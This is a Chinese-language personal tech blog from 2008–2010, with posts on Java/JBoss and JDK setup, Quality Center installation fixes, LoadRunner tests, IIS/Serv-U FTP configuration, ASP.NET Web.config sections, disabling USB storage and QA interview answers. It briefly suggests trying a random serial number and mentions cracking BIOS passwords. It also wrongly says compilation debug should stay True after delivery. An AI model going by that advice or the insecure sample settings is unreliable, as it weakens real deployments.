-
JAVA环境搭建的过程
2010-09-30 12:21:46
1:windows>preferences> java>installed JREs
目录指向JDk的安装目录
JBoss home directory:指的jboss的安装目录
如:D:\EasyTrack\jboss
option program argument:
如:
-DHOMEDIR=D:\EasyTrack -DCacheSwitch=true -b 0.0.0.0
3:windows>preferences> java——BuildPath——User Libraries
指向正确的lib库
例如:D:\EasyTrack\SVN\trunk\lib
4:端口冲突,重新启动
5:数据库配置需正确
编译好的文件:
D:\EasyTrack\jboss\server\default\deploy\et.ear
删除布属的文件
D:\EasyTrack\jboss\server\default\work\jboss.web\localhost\pm
-
QC安装过程所遇到的问题
2010-09-28 10:37:38
1:安装sql2000时提示无法验证序列号或其它安装错误的解决方法安装sql2000时提示无法验证序列号或其它安装错误
解决方法:
打开注册表编辑器并定为到:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
找到名为“SafeDLLSearchMode”的DWORD值,切换修改他的值 0 或 1,如果没有则创建这个DWORD值。
我上面没有,直接建了一个,值就是默认的0,如果还不行就随便找个2003 SP1的序列号试下,再不行的话你就拿刀来砍我。是不是安装成功了。嘿嘿~~~~
2:安装QC时,当本机没有加入任何域时,在域输入框中输入本机的计算机名,安装的时候在填写本机账户密码那个地方有个域需要写,如果没有域需要填写本机的机器名
3:拖盘中无QC图标显示,需手动启动qc server,解决方法是运行:RunQCTrayIcon.bat ,没找到RunQCTrayIcon.bat文件, 清理时把启动项中的链接删除了,现在想还原都不行了,试一下新建启动项。
目标 "C:\Program Files\Mercury\Quality Center\bin\Jboss\QCTrayIcon.exe" http://localhost:8080/qcbin/servlet/tdservlet,"C:\Program Files\Mercury\Quality Center\bin\WindowsTools\sc.exe"
起始位置:"C:\Program Files\Mercury\Quality Center\"
里面的参数什么的 按照自己的实际情况来。~~4:IE8.0不支持的问题
1)找到文件:C:\Program Files\Mercury\Quality Center\jboss\server\default\deploy\20qcbin.war这个文件是以.war为后缀名的文件,双击 “20sabin.war”在其中找到“start_a.htm、start_b.htm”这两个文件,点击右键“解压到桌面”然后修改其中的内容;
找到“var fMSIE67 = (ua.lastIndexOf('MSIE 6.0') != -1)|| (ua.lastIndexOf('MSIE 7.0') != -1);”代码,在该段代码最后添加“|| (ua.lastIndexOf('MSIE 8.0') != -1);”。修改后的代码变为:“var fMSIE67 = (ua.lastIndexOf('MSIE 6.0') != -1)|| (ua.lastIndexOf('MSIE 7.0') != -1)|| (ua.lastIndexOf('MSIE 8.0') != -1) ;”。点击保存退出文件。然后在winrar点击“添加”找到文件选择“添加并替换文件”就覆盖原来的文件。
2)在服务器端找到文件C:\Program Files\Mercury\Quality Center\jboss\server\default\deploy\10sabin.war这个文件也是以.war为后缀名的文件,双击 “10sabin.war”在其中找到“SiteAdmin.htm”这个文件,点击右键“解压到桌面”然后修改其中的内容;
找到“var fMSIE67 = (ua.lastIndexOf('MSIE 6.0') != -1)|| (ua.lastIndexOf('MSIE 7.0') != -1);”代码,在该段代码最后添加“|| (ua.lastIndexOf('MSIE 8.0') != -1);”。修改后的代码变为:“var fMSIE67 = (ua.lastIndexOf('MSIE 6.0') != -1)|| (ua.lastIndexOf('MSIE 7.0') != -1)|| (ua.lastIndexOf('MSIE 8.0') != -1) ;”。点击保存退出文件。然后在winrar点击“添加”找到文件选择“添加并替换文件”就覆盖原来的文件
重新启动电脑就可以6:遇到一个一台主机遇到两个JBOSS的情况,需要修改端口才能正常使用,还没有搞定
卸载
1)打开“控制面板”进入“添加/删除程序”,把mercury quanlity center项删除,现在估计都流行用360了。
2)手动删除你安装QC的目录;
3)删除所有与QC相关的文件及注册表;在“开始”菜单的“运行”中输入regedit进入到注册表编辑器,用Ctrl+F查找mercury quality center,查找下一个,直到把所有的quanlity center删完。(只有一处)然后用
quality center来搜索,删除所有的注册项值。即可,有几处
4)如果C:\Program Files\Common Files目录下有Mercury Interactivet文件未被删除,也手动把它删除!
要想重新安装QC,就不能在电脑上留下任何QC的痕迹,不然是无法重新成功安装的。
-
学习loadrunne第三天
2010-09-03 10:38:33
问题1:关于LoadRunner 的场景设置duration选项
在场景设置duration选项(Duration:run for 00:02:00)不知道是duration是表示每个用户只运行2分钟,还是所有用户登陆成功后,再一起运行2分钟。
脚本介绍:vuser_init,vuser_end二部分都为空,action部分的脚本打开几个网页。
经过四次的测试,Duration选项一直为run for 00:02:00,每次更换Start Vuser的设置,结果如下:
Start Vuser:每5秒1用户登陆,共1用户。
Start Vuser:每5秒1用户登陆,共2用户。
Start Vuser:每1分钟1用户登陆,共2用户。
注:第一个用户运行三分钟
Start Vuser:每2分钟1用户登陆,共2用户。
注:第一个用户运行四分钟
通过Action的数:
29
45
57
69
Action的TPS:
0.3
0.3
0.4
0.4
点击率
8.152
12.333
11.085
9.936
Action的平均事务时间:
4.087
5.445
5.299
5.255
从上表中可以知道,duration:run for 00:02:00是所有用户登陆成功后,再一起运行2分钟。通过不同设置,会导致点击率和平均事务时间有变化,设置场景时要慎重考虑。
问题二:集合点与手动场景设置中的加压方式的区别
有很大区别的,集合点可以使脚本的任何一个transaction进行并发,但是手动场景设置中的每秒钟运行多少用户,或者所有用户一起运行,这只能在开始的地方即初始化部分开始,作用不同,差别也很大所有用户一起运行,是在开始时达到并发的目的,而在运行的过程中,各个用户到达的程度就不一样了。集合点就是到达集合点的时候对集合点策略进行判断,如5个人并发,系统判断一下,够5个人了么,够了的话,系统就把这5个人一下全放过去,有点和开始时的策略一致,不同的时,集合点是对策略内部细致的设置。问题三:1、 需要注意的地方:当在“Parameter List”中的“Select next row”选中“Unique”时,如果再在“Edit Schedule\Schedule by Scenario\Duration”中选中第二项“Run for XX after the ramp up has been completed”时系统就会报错,提示“Unique”类型不相符。
-
windows2003服务之FTP
2009-05-21 11:56:43
一:FTP(文件传输协议)概述·工作原理FTP与大多数internet服务一样,也是采用客户机/服务器的方式。使用方法很简单1>启动FTP客户端程序,与远程主机建立连接2>向远程主机发出传输命令3>远程主机在收到命令后就给予响应,并执行正确的命令。完成上传或下载的服务。·FTP服务器FTP服务器可以有两种登陆方式1>匿名登陆:一般匿名登陆只能下载FTP服务器的资源,且传输速度相对较慢,当然这要在FTP服务器上进行设置。针对这类用户,在FTP服务器上需要加以限制,不宜开启过高的权限,带宽应尽可能小。2>授权帐户登陆:需要管理员将帐户与密码告诉用户,管理员对这些帐户进行设置,例如他们能访问哪些资源,下载与上传速度等。·FTP客户端FTP客户端可以通过三种方式连接FTP站点1>命令行方式2>WEB方式3>本地安装FTP客户端软件方式二:安装和配置FTP服务·安装FTP服务打开“添加和删除程序”------“添加和删除windows组件”
打开应用程序服务器
勾选internet信息服务(IIS)----并打开
勾选“文件传输协议(FTP)服务”
确定后完成安装·配置默认FTP站点在“管理工具”中打开“Internet信息服务(IIS)管理器”,找到“FTP站点”----“默认FTP站点”,并右击“默认FTP站点”,选择“属性”,开始配置默认FTP站点。1>FTP站点选项卡描述:键入对该站点的说明文字,这个名字将会出现在“IIS管理器”左窗格的目录中,以标识该站点IP地址:设置此站点使用的IP地址。如果此服务器有多个IP地址,选择其中的一个即可。倘若在IIS服务器中同时执行多个FTP站点,可以使用不同的IP地址。这样用户在访问FTP站点时,只要在浏览器中输入"ftp:// ip地址"就可以访问FTP服务器了。TCP端口:如果站点为了安全不使用21这个默认保留给FTP服务器的端口,则在此重新设置一端口。倘若在IIS服务器中同时执行多个FTP站点,也可以使用不同的端口。这样在用户访问FTP站点时,在浏览器中输入“[url]ftp://ip[/url]地址:端口号”FTP站点连接:该设置决定了能同时连接到服务器的客户端的数量。“不受限制”指该FTP站点不限制客户数量的并发连接,服务器接收连接直到内存不足。“连接限制为”可以强制限制同时连接到服务器的客户端连接数,这样可以保持服务器的良好性能。连接超时:在框中键入数字(以秒为单位)设置服务器在断开与非活动用户的连接之前的等待的时间。启用日志记录:可以使用日志文件记录用户访问FTP站点的操作,日志的具体设置,可以单击“属性”按钮,在弹出的“日志记录属性”对话框中进行修改。
2>安全帐户选项卡默认FTP站点允许匿名连接,所有的用户都会通过“IUSR_计算机名称”帐户来访问站点中的文件。用户用IE浏览器访问FTP站点时无需输入帐户与密码.在“浏览”中可选择登陆FTP站点的匿名帐户。如果勾选“只允许匿名连接”复选框,则用户将无法使用用户名和密码登陆如果去掉“允许匿名连接”单选框,则用户将只能使用用户名和密码登陆
3>消息选项卡标题 ----设置FTP站点的名称欢迎-----设置用户连接到FTP站点时,显示的欢迎信息退出------设置用户退出FTP站点时,显示的信息最大连接数-----显示连接数量超过服务器设置的最大值时(在FTP站点选项卡下设置),显示的信息。
4>主目录选项卡此资源的内容来源:“此计算机上的目录”可以设置FTP文件夹所在的本机路径;“另一台计算机上的目录”可以设置FTP文件夹所在的网络上的路径。设置权限 “读取”指用户可以下载FTP资源,“写入”指用户可以上传FTP资源。
5>目录安全性选项卡如果想要允许所有计算机访问FTP站点,则勾选“授权”如果想要拒绝一台或者一组客户机访问此FTP站点,则先勾选“授权访问”,然后在下拉列表中添加要拒绝访问的计算机。如果想要授权一台或者一组客户机访问此FTP站点,则先勾选“拒绝访问”,然后在下拉列表中添加要授权访问的计算机。
三:客户端访问·命令行方式访问1>登陆FTPftpftp>open FTP服务器ip2>退出FTPftp>bye3>操作ftp>dir 查看FTP服务器资源ftp>cd 进入FTP服务器文件夹4>下载与上传ftp>get 文件名 从FTP服务器下载文件,文件下载到登陆FTP时所在的目录。ftp>put 文件名 上传文件到ftp服务器。ftp>mget 文件名1 文件名2 ...... 一次从FTP服务器下载多个文件ftp>mput 文件名1 文件名2 ...... 一次上传多个文件到FTP服务器5>使用帮助ftp> ? 显示出FTP全部命令。
·WEB方式访问可以通过浏览器连接到FTP服务器,打开IE浏览器,在URL处键入“ftp://IP地址”
·FTP客户端软件方式访问可以使用FlashFXP这个客户端软件进行连接。下载和上传速度比较快,建议使用客户端软件访问FTP服务器。
四:利用软件建立FTP站点·IIS中的FTP服务可以满足企业基本要求,但如果FTP站点要求对用户的下载或上传速度进行限制等功能,单纯使用IIS就无能为力了。此时需要借助一款FTP服务的软件Serv-U。Serv-U拥有IIS所有的功能,并且比IIS功能还要强大。那为什么还要学习IIS建立FTP站点呢?因为服务器上安装的软件越少,系统速度越快,并且产生的问题也越少。所以在服务器上最好不要借助太多的软件,除非实在需要。·新建域安装好Serv—U后,打开“Serv-U管理员”,右击“域”,选择“新建域”
输入此服务器的IP地址
输入此服务器的域名,如ftp.51cto.com
为了安全,可以更改端口号,不过用户访问时,需在浏览器中输入ftp.51cto.com:端口号
“域类型”中可选择“.INE文件”,对于大的域(>500用户)注册表提供更好的性能。
·新建用户新建好域后,就可以新建该域的用户,这些用户是独立于操作系统的用户。新建用户步骤如下右击“用户”,选择“新建用户”。
输入“用户名称”,该名称应该是唯一的。键入新建用户的密码,单击下一步
在“主目录”中,输入文件夹路径,表示用户登陆后显示的路径
在“是否锁定用户于主目录”中,选择“是”单选按钮,用户只能看到自己的主目录,不能访问其他目录。单击“完成”后完成用户的创建
·配置用户在用户各选项卡中可以配置用户上传与下载速度、线程数限制、磁盘配额等。1>账号选项卡禁用账号 可暂时禁用掉此用户,也可在规定的时间后禁用或删除掉此帐号用户名 可修改用户名主目录 可更改该用户登陆后显示的用户将用户锁定与主目录 可选择锁定主目录或者不锁定
2>常规选项卡隐藏“隐藏”文件 将服务器中的隐藏文件隐藏或显示同一IP地址只允许()个登陆 限制用户线程数最大上传和下载速度 限制用户上传速度与下载速度最大用户数量 此服务器最多允许多少个此用户登陆
3>目录访问选项卡文件权限可设置读取、写入(下载)、追加(添加)、删除、执行(可执行文件)。目录权限可设置列表(读取)、创建、删除
4>配额选项卡限制用户的最大占用空间,单位MB。计算当前 指计算当前用户占用了多少MB的磁盘空间。
-
Web.config说明
2009-05-20 15:10:01
一、认识Web.config文件
Web.config文件是一个XML文本文件,它用来储存 ASP.NET Web 应用程序的配置信息(如最常用的设置ASP.NET Web 应用程序的身份验证方式),它可以出现在应用程序的每一个目录中。当你通过VB.NET新建一个Web应用程序后,默认情况下会在根目录自动创建一个默认的
Web.config文件,包括默认的配置设置,所有的子目录都继承它的配置设置。如果你想修改子目录的配置设置,你可以在该子目录下新建一个Web.config文件。它可以提供除从父目录继承的配置信息以外的配置信息,也可以重写或修改父目录中定义的设置。
在运行时对Web.config文件的修改不需要重启服务就可以生效(注:<processModel> 节例外)。当然Web.config文件是可以扩展的。你可以自定义新配置参数并编写配置节处理程序以对它们进行处理。
二、web.config配置文件(默认的配置设置)以下所有的代码都应该位于
<configuration>
<system.web>
和
</system.web>
</configuration>
之间,出于学习的目的下面的示例都省略了这段XML标记
1、<authentication> 节
作用:配置 ASP.NET 身份验证支持(为Windows、Forms、PassPort、None四种)。该元素只能在计算机、站点或应用程序级别声明。<authentication> 元素必需与<authorization> 节配合使用。
示例:
以下示例为基于窗体(Forms)的身份验证配置站点,当没有登陆的用户访问需要身份验证的网页,网页自动跳转到登陆网页。
<authentication mode="Forms" >
<forms loginUrl="logon.aspx" name=".FormsAuthCookie"/>
</authentication>
其中元素loginUrl表示登陆网页的名称,name表示Cookie名称
2、<authorization> 节
作用:控制对 URL 资源的客户端访问(如允许匿名用户访问)。此元素可以在任何级别(计算机、站点、应用程序、子目录或页)上声明。必需与<authentication> 节配合使用。
示例:以下示例禁止匿名用户的访问
<authorization>
<deny users="?"/>
</authorization>
注:你可以使用user.identity.name来获取已经过验证的当前的用户名;可以使用
web.Security.FormsAuthentication.RedirectFromLoginPage方法将已验证的用户重定向到用户刚才请求的页面.具体的实例请参考:
Forms验证 http://www.fanvb.net/websample/dataauth.aspx
3、<compilation>节
作用:配置 ASP.NET 使用的所有编译设置。默认的debug属性为“True”.在程序编译完成交付使用之后应将其设为True(Web.config文件中有详细说明,此处省略示例)
4、<customErrors>
作用:为 ASP.NET 应用程序提供有关自定义错误信息的信息。它不适用于 XML Web services 中发生的错误。
示例:当发生错误时,将网页跳转到自定义的错误页面。
<customErrors defaultRedirect="ErrorPage.aspx" mode="RemoteOnly">
</customErrors>
其中元素defaultRedirect表示自定义的错误网页的名称。mode元素表示:对不在本地 Web 服务器上运行的用户显示自定义(友好的)信息。
5、<httpRuntime>节
作用:配置 ASP.NET HTTP 运行库设置。该节可以在计算机、站点、应用程序和子目录级别声明。
示例:控制用户上传文件最大为4M,最长时间为60秒,最多请求数为100
<httpRuntime maxRequestLength="4096" executionTimeout="60" appRequestQueueLimit="100"/>
6、 <pages>
作用:标识特定于页的配置设置(如是否启用会话状态、视图状态,是否检测用户的输入等)。<pages>可以在计算机、站点、应用程序和子目录级别声明。
示例:不检测用户在浏览器输入的内容中是否存在潜在的危险数据(注:该项默认是检测,如果你使用了不检测,一要对用户的输入进行编码或验证),在从客户端回发页时将检查加密的视图状态,以验证视图状态是否已在客户端被篡改。(注:该项默认是不验证)
<pages buffer="true" enableViewStateMac="true" validateRequest="false"/>
7、<sessionState>
作用:为当前应用程序配置会话状态设置(如设置是否启用会话状态,会话状态保存位置)。
示例:
<sessionState mode="InProc" cookieless="true" timeout="20"/>
</sessionState>
注:
mode="InProc"表示:在本地储存会话状态(你也可以选择储存在远程服务器或SAL服务器中或不启用会话状态)
cookieless="true"表示:如果用户浏览器不支持Cookie时启用会话状态(默认为False)
timeout="20"表示:会话可以处于空闲状态的分钟数
8、<trace>
作用:配置 ASP.NET 跟踪服务,主要用来程序测试判断哪里出错。
示例:以下为Web.config中的默认配置:
<trace enabled="false" requestLimit="10" pageOutput="false" traceMode="SortByTime" localOnly="true" />
注:
enabled="false"表示不启用跟踪;requestLimit="10"表示指定在服务器上存储的跟踪请求的数目
pageOutput="false"表示只能通过跟踪实用工具访问跟踪输出;
traceMode="SortByTime"表示以处理跟踪的顺序来显示跟踪信息
localOnly="true" 表示跟踪查看器 (trace.axd) 只用于宿主 Web 服务器
三、自定义Web.config文件配置节
自定义Web.config文件配置节过程分为两步。
一是在在配置文件顶部 <configSections> 和 </configSections>标记之间声明配置节的名称和处理该节中配置数据的 .NET Framework 类的名称。
二是在 <configSections> 区域之后为声明的节做实际的配置设置。
示例:创建一个节存储数据库连接字符串
<configuration>
<configSections>
<section name="appSettings" type="System.Configuration.NameValueFileSectionHandler, System, Version=1.0.3300.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/>
</configSections>
<appSettings>
<add key="scon" value="server=a;database=northwind;uid=sa;pwd=123"/>
</appSettings>
<system.web>
......
</system.web>
</configuration>
四、访问Web.config文件
你可以通过使用ConfigurationSettings.AppSettings 静态字符串集合来访问 Web.config 文件示例:获取上面例子中建立的连接字符串。
Dim sconstr As String = ConfigurationSettings.AppSettings("SconStr")
Dim scon = New SqlConnection(sconstr) -
禁用USB
2008-05-31 08:38:35
前几天见个朋友问禁用USB的方法,也忘了是哪个朋友了,不好意思了,这里说下,不是软件了,是本人自己以前收集的了,可以禁用USB的。
方法1在BIOS中禁用,在advance chip setting里,关闭USB ON BOARD选项,可以通过debug
,放电,或者软件等方法破解BIOS密码。
方法2权限,如果计算机上尚未安装USB存储设备,向用户或组分配对%systemRoot%\inf\usbstor.pnf和%systemRoot%\inf\usbstor。inf两个文件的“拒绝权限”。
方法3如果计算机上已安装过USB设备,请打开注册表HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\USBSTOR注册表项中的“start”值设置为4
在说个让U盘只能读取的方法,打开注册表定位到HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\STORAGEDERICEPOLICIES.然后在右侧窗口新建一个名为writeprotect的dword值,并将值设置为1即可。
有软件的人就不说了,没软件的朋友可以用这些方法的了。希望对大家有些帮助了,不知道这个方法版主给加精不加啊,呵呵 -
配置JDK的过程
2008-04-10 14:41:04
首先了解什么是环境变量吧:
什么是环境变量?
什么是环境变量,这个问题有很多初学电脑的朋友都不是很清楚,我在网上搜了一下也没有得到
什么表较满意的答案。所以我以自已对环境变的理解在这里给大家解释一下。
关于环境变量没有很确切的定义,这里就先举一个例子吧:
打开“开始->运行”,在对话框里输入“calc”并回车,看看是不是打开了“计算器”,或者在“命令提示符”中输入“calc”并回车,看看是不是也打开了“计算器”。现在我们进入
“C:\Windows\System32”目录,看看里面是不是有一个名为“calc.exe”的文件,在看看里面别的可执行文件:
mspaint.exe为画图程序,notepad.exe为记事本程序。你在“运行”或“命令提示符”中分别输入
“mspaint”和“notepad”是不是又打开了“画图”和“记事本”呢。
现在我们在“运行”和“命令提示符”中输入“qq”并回车,能打开QQ吗?并没有,而是提示“windows找不到程序qq”和“'qq' 不是内部或批处理文件。”。
要怎样才能打开QQ呢?我的QQ是安装在“C:\Program Files\Tencent\QQ”这个目录里的。现在我们在“运行”里输入“cmd”并回车,在打开的“命令提示符中”输入“cd C:\Program
Files\Tencent\QQ”,这个命令的作用是进入QQ的安装目录,现在我们就可以输入“qq”并回车直接打开QQ
了。
为什么我们输入“calc”、“mspaint”和“notepad”就可以直接打开对应的程序,而打开QQ就必须进入QQ的安装目录才行呢?现在我们就来看看这其中的关键环节。右击“我的电脑”选择“属性”,
切换到“高级”选项卡,单其中的“环境变量”,在“系统变量”中我们看到一个名为“path”的变量,
我们双击打开它看到它的变量值为“C:\Program Files\Rockwell Software\RSCommon;%SystemRoot%
\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Autodesk
Shared\;”。这个变量值是用“;”分开的一些目录,其中我们可以看到“%SystemRoot%\System32”目录
,其中的“%SystemRoot%”指的是系统盘下的“Windows”目录,如果系统装在C盘,那这个目录其实就是
“C:\Windows\System32”,而我们先前讲的“calc.exe”、“mspaint.exe”和“notepad.exe”都在
“C:\Windows\System32”这个目录中,而在“path”的变量值中我们没有找到“C:\Program
Files\Tencent\QQ”,现在你就知道开始举的例子是为什么了吧。
现在我们就对“path”这个变量的值修改一下,在它的变量值的最后加上“;C:\ProgramFiles\Tencent\QQ”,然后一路点击确定返回到桌面。注意在加上的那个目录前有一个“;”,因为要和
前面的那个目录分开。好了,大功告成了,现要你在“运行”和“命令提示符”里的任何目录中输入“qq
”,就都可以方便的打开QQ了。
例子讲完了,其实什么是环境变量,也就不言而知了。拜拜!快去试一下吧1:下载JDK1.4.2.05,并安装到C盘的根目录下
2:在我的电脑à属性à环境变量à系统变量下,新增JAVA_HOME系统变量,如下图所示(注意:变量值为jdk安装的实际路径)
变量值: c:\j2se1.5.0_6 注:此路径是你jdk的安装路径
然后编辑系统变量path;
变量名: path
变量值: ;%java_home%\bin; 注:在原来值的基础上加
新建用户变量
变量名: classpath
变量值: c:\j2se1.5.0_6\lib\tools.jar ;
点击确定
编写一个简单的java实例来测试一下
public class helloworld
{
public static void main(string args[])
{
system.out.println("恭喜你,jdk已经配置成功");
}
}
把文件另存为c:\下 在命令提示符下输入cmd然后再输入
c:\javac c:\helloworld.java
如果命令提示窗口没有任何反映那么表示编译成功,javac会在c盘下生成一个helloworld.class的文件,叫类文件
然后执行这个类文件 在命令提示符下输入
c:\java helloworld
命令提示符窗口出现
恭喜你,jdk已经配置成功
应该注意的是 . 和 ; 是容易弄错的 不要忘了加 -
JAVA的特点
2008-03-25 09:17:13
JAVA的最大特点就是跨平台性。那么什么是平台呢?所谓平台就是软件的运行环境,比如说:Windows操作系统、Linux操作系统、手机操作系统等。所以学习JAVA最大的好处是可以专注程序本身,而不用考虑运行环境。原则上可以达到一次编译到处运行。 另外,JAVA在企业级应用上有很大的市场。因为JAVA的开源项目很多,在实际开发项目时,可以找到大量的源码供您应用。
-
一个国外软件测试高手云集的论坛
2008-03-05 16:26:46
-
英语学习网站
2008-03-05 16:23:53
国内主要英语学习网站
普特英语听力 http://www.putclub.com
BBC中国 http://www.bbc.co.uk/china
Shanghai daily http://www.shanghaidaily.com
英美主要商业网站
商业周刊 http://www.businessweek.com
中文刊 http://www.businessweekchina.com
哈佛商业评论 http://www.hbr.com
经济学家 http://www.enconomist.com
企业家 http://www.entrepreneur.com
金融时报 http://www.ft.com
Stanford商学院 http://www.gsb.stanford.edu
Harvard商学院 http://www.hbs.edu
沃顿商学院 http://www.wharton.upenn.edu
科学美国人 http://www.sciam.com
美国主要杂志
时代周刊 http://www.time.com
时尚 http://www.style.com/vogue/index.html
国家地理杂志 http://www.nationalgeographic.com
人物 http://people.aol.com/people/index.html
美国新闻报道 http://www.usnews.com
读者文摘 http://www.rd.com
体育画报 http://sportsillustrated.snn.com
美国周末 http://www.usaweekend.com
美国主要报纸
洛杉矶时报 http://www.latimes.com
华尔街日报评论 http://www.opinionjournal.com
巴尔的摩太阳报 http://www.baltimoresun.com
华盛顿邮报 http://www.washingtonpost.com
华尔街日报 http://www.wsj.com
新闻周刊 http://www.newsweekly.com
基督教科学箴言报 http://www.csmonitor.com
先驱日报 http://hjnews.townnews.com
路透社 http://today.reuters.com/new/home.aspx
纽约每日新闻 http://www.nydailynews/home.aspx
远东经济评论 http://www.feer.com
国际先驱论坛报 http://www.iht.com
美国快报 http://home.americanexpress.com
芝加哥论坛报 http://www.chicagotribune.com
华盛顿新闻报 http://www.newsday.com
商业日报 http://www.joc.com
华盛顿每日新闻 http://www.wdnweb.com
美国主要媒体
全美广播电台 http://www.npr.org
Fox http://www.fox.com/home.htm
-
QA英语面试题
2008-03-05 16:17:05
QA常见面试问题答与问(English)
Interview questions on WinRunner
- How you used WinRunner in your project? - Yes, I have been using WinRunner for creating automated scrīpts for GUI, functional and regression testing of the AUT.
- Explain WinRunner testing process? - WinRunner testing process involves six main stages
- Create GUI Map File so that WinRunner can recognize the GUI objects in the application being tested
- Create test scrīpts by recording, programming, or a combination of both. While recording tests, insert checkpoints where you want to check the response of the application being tested.
- Debug Test: run tests in Debug mode to make sure they run smoothly
- Run Tests: run tests in Verify mode to test your application.
- View Results: determines the success or failure of the tests.
- Report Defects: If a test run fails due to a defect in the application being tested, you can report information about the defect directly from the Test Results window.
- What is contained in the GUI map? - WinRunner stores information it learns about a window or object in a GUI Map. When WinRunner runs a test, it uses the GUI map to locate objects. It reads an object.s descrīption in the GUI map and then looks for an object with the same properties in the application being tested. Each of these objects in the GUI Map file will be having a logical name and a physical descrīption. There are 2 types of GUI Map files. Global GUI Map file: a single GUI Map file for the entire application. GUI Map File per Test: WinRunner automatically creates a GUI Map file for each test created.
- How does WinRunner recognize objects on the application? - WinRunner uses the GUI Map file to recognize objects on the application. When WinRunner runs a test, it uses the GUI map to locate objects. It reads an object.s descrīption in the GUI map and then looks for an object with the same properties in the application being tested.
- Have you created test scrīpts and what is contained in the test scrīpts? - Yes I have created test scrīpts. It contains the statement in Mercury Interactive.s Test scrīpt Language (TSL). These statements appear as a test scrīpt in a test window. You can then enhance your recorded test scrīpt, either by typing in additional TSL functions and programming elements or by using WinRunner.s visual programming tool, the Function Generator.
- How does WinRunner evaluate test results? - Following each test run, WinRunner displays the results in a report. The report details all the major events that occurred during the run, such as checkpoints, error messages, system messages, or user messages. If mismatches are detected at checkpoints during the test run, you can view the expected results and the actual results from the Test Results window.
- Have you performed debugging of the scrīpts? - Yes, I have performed debugging of scrīpts. We can debug the scrīpt by executing the scrīpt in the debug mode. We can also debug scrīpt using the Step, Step Into, Step out functionalities provided by the WinRunner.
- How do you run your test scrīpts? - We run tests in Verify mode to test your application. Each time WinRunner encounters a checkpoint in the test scrīpt, it compares the current data of the application being tested to the expected data captured earlier. If any mismatches are found, WinRunner captures them as actual results.
- How do you analyze results and report the defects? - Following each test run, WinRunner displays the results in a report. The report details all the major events that occurred during the run, such as checkpoints, error messages, system messages, or user messages. If mismatches are detected at checkpoints during the test run, you can view the expected results and the actual results from the Test Results window. If a test run fails due to a defect in the application being tested, you can report information about the defect directly from the Test Results window. This information is sent via e-mail to the quality assurance manager, who tracks the defect until it is fixed.
- What is the use of Test Director software? - TestDirector is Mercury Interactive.s software test management tool. It helps quality assurance personnel plan and organize the testing process. With TestDirector you can create a database of manual and automated tests, build test cycles, run tests, and report and track defects. You can also create reports and graphs to help review the progress of planning tests, running tests, and tracking defects before a software release.
- Have you integrated your automated scrīpts from TestDirector? - When you work with WinRunner, you can choose to save your tests directly to your TestDirector database or while creating a test case in the TestDirector we can specify whether the scrīpt in automated or manual. And if it is automated scrīpt then TestDirector will build a skeleton for the scrīpt that can be later modified into one which could be used to test the AUT.
- What are the different modes of recording? - There are two type of recording in WinRunner. Context Sensitive recording records the operations you perform on your application by identifying Graphical User Interface (GUI) objects. Analog recording records keyboard input, mouse clicks, and the precise x- and y-coordinates traveled by the mouse pointer across the screen.
- What is the purpose of loading WinRunner Add-Ins? - Add-Ins are used in WinRunner to load functions specific to the particular add-in to the memory. While creating a scrīpt only those functions in the add-in selected will be listed in the function generator and while executing the scrīpt only those functions in the loaded add-in will be executed else WinRunner will give an error message saying it does not recognize the function.
- What are the reasons that WinRunner fails to identify an object on the GUI? - WinRunner fails to identify an object in a GUI due to various reasons. The object is not a standard windows object. If the browser used is not compatible with the WinRunner version, GUI Map Editor will not be able to learn any of the objects displayed in the browser window.
- What is meant by the logical name of the object? - An object.s logical name is determined by its class. In most cases, the logical name is the label that appears on an object.
- If the object does not have a name then what will be the logical name? - If the object does not have a name then the logical name could be the attached text.
- What is the different between GUI map and GUI map files? - The GUI map is actually the sum of one or more GUI map files. There are two modes for organizing GUI map files. Global GUI Map file: a single GUI Map file for the entire application. GUI Map File per Test: WinRunner automatically creates a GUI Map file for each test created. GUI Map file is a file which contains the windows and the objects learned by the WinRunner with its logical name and their physical descrīption.
- How do you view the contents of the GUI map? - GUI Map editor displays the content of a GUI Map. We can invoke GUI Map Editor from the Tools Menu in WinRunner. The GUI Map Editor displays the various GUI Map files created and the windows and objects learned in to them with their logical name and physical descrīption.
- When you create GUI map do you record all the objects of specific objects? - If we are learning a window then WinRunner automatically learns all the objects in the window else we will we identifying those object, which are to be learned in a window, since we will be working with only those objects while creating scrīpts.
LoadRunner interview questions- What is load testing? - Load testing is to test that if the application works fine with the loads that result from large number of simultaneous users, transactions and to determine weather it can handle peak usage periods.
- What is Performance testing? - Timing for both read and update transactions should be gathered to determine whether system functions are being performed in an acceptable timeframe. This should be done standalone and then in a multi user environment to determine the effect of multiple transactions on the timing of a single transaction.
- Did u use LoadRunner? What version? - Yes. Version 7.2.
- Explain the Load testing process? -
Step 1: Planning the test. Here, we develop a clearly defined test plan to ensure the test scenarios we develop will accomplish load-testing objectives. Step 2: Creating Vusers. Here, we create Vuser scrīpts that contain tasks performed by each Vuser, tasks performed by Vusers as a whole, and tasks measured as transactions. Step 3: Creating the scenario. A scenario describes the events that occur during a testing session. It includes a list of machines, scrīpts, and Vusers that run during the scenario. We create scenarios using LoadRunner Controller. We can create manual scenarios as well as goal-oriented scenarios. In manual scenarios, we define the number of Vusers, the load generator machines, and percentage of Vusers to be assigned to each scrīpt. For web tests, we may create a goal-oriented scenario where we define the goal that our test has to achieve. LoadRunner automatically builds a scenario for us. Step 4: Running the scenario.
We emulate load on the server by instructing multiple Vusers to perform tasks simultaneously. Before the testing, we set the scenario configuration and scheduling. We can run the entire scenario, Vuser groups, or individual Vusers. Step 5: Monitoring the scenario.
We monitor scenario execution using the LoadRunner online runtime, transaction, system resource, Web resource, Web server resource, Web application server resource, database server resource, network delay, streaming media resource, firewall server resource, ERP server resource, and Java performance monitors. Step 6: Analyzing test results. During scenario execution, LoadRunner records the performance of the application under different loads. We use LoadRunner.s graphs and reports to analyze the application.s performance. - When do you do load and performance Testing? - We perform load testing once we are done with interface (GUI) testing. Modern system architectures are large and complex. Whereas single user testing primarily on functionality and user interface of a system component, application testing focuses on performance and reliability of an entire system. For example, a typical application-testing scenario might depict 1000 users logging in simultaneously to a system. This gives rise to issues such as what is the response time of the system, does it crash, will it go with different software applications and platforms, can it hold so many hundreds and thousands of users, etc. This is when we set do load and performance testing.
